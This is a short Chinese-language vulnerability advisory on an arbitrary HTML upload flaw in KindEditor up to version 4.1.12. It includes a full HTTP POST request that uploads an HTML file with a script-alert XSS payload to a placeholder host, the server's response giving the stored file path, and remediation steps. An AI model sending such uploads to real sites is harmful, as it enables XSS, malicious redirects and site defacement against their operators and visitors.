KindEditor 檔案上傳漏洞
漏洞存在于KindEditor編輯器裡,你能上傳.txt和.html檔案,支援php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5編輯器中。
這裡html裡面可以嵌套暗連結位址以及嵌套xss。Kindeditor上的uploadbutton.html用于檔案上傳功能頁面,直接POST到/upload_json.*?dir=file,在允許上傳的檔案擴充名中包含htm,txt:extTable.Add(“file”,“doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2”)
由于KindEditor中upload_json.*上傳功能檔案允許被直接調用進而實作上傳htm,html到檔案到伺服器,使用者可以通過上傳存在包含跳轉到違規站點的代碼進而實作的惡意攻擊。
Kindeditor版本<4.1.12
漏洞存在于<=Kindeditor4.1.12編輯器中,是以先檢視編輯器版本
1.檢視版本資訊
http://www.xxx.com/kindeditor//kindeditor.js
2.漏洞驗證
Request資料包
POST /kindeditor/asp/upload_json.asp?dir=file HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------283422705626536477632563104216
Content-Length: 260
Connection: close
Cookie: ASPSESSIONIDQACQQBTT=XXXXXXXXXXXX
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
-----------------------------283422705626536477632563104216
Content-Disposition: form-data; name="imgFile"; filename="1.html"
Content-Type: application/octet-stream
<script>alert('1')</script>
-----------------------------283422705626536477632563104216-- Response資料包
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Server: Microsoft-IIS/10.0
Set-Cookie: ASPSESSIONIDSQBRRCAB=BNLFKMXXXXXXXXM; path=/
X-Powered-By: ASP.NET
Date: Thu, 09 Sep 2021 07:33:15 GMT
Connection: close
Content-Length: 94
{"error":0,"url":"\/kindeditor\/asp\/..\/attached\/file\/20210909\/20210909153396539653.html"} 1.直接删除upload_json.和file_manager_json.
2.更新kindeditor到最新版本
參考連結
https://www.anquanke.com/post/id/171422
https://www.cnblogs.com/backlion/p/10421405.html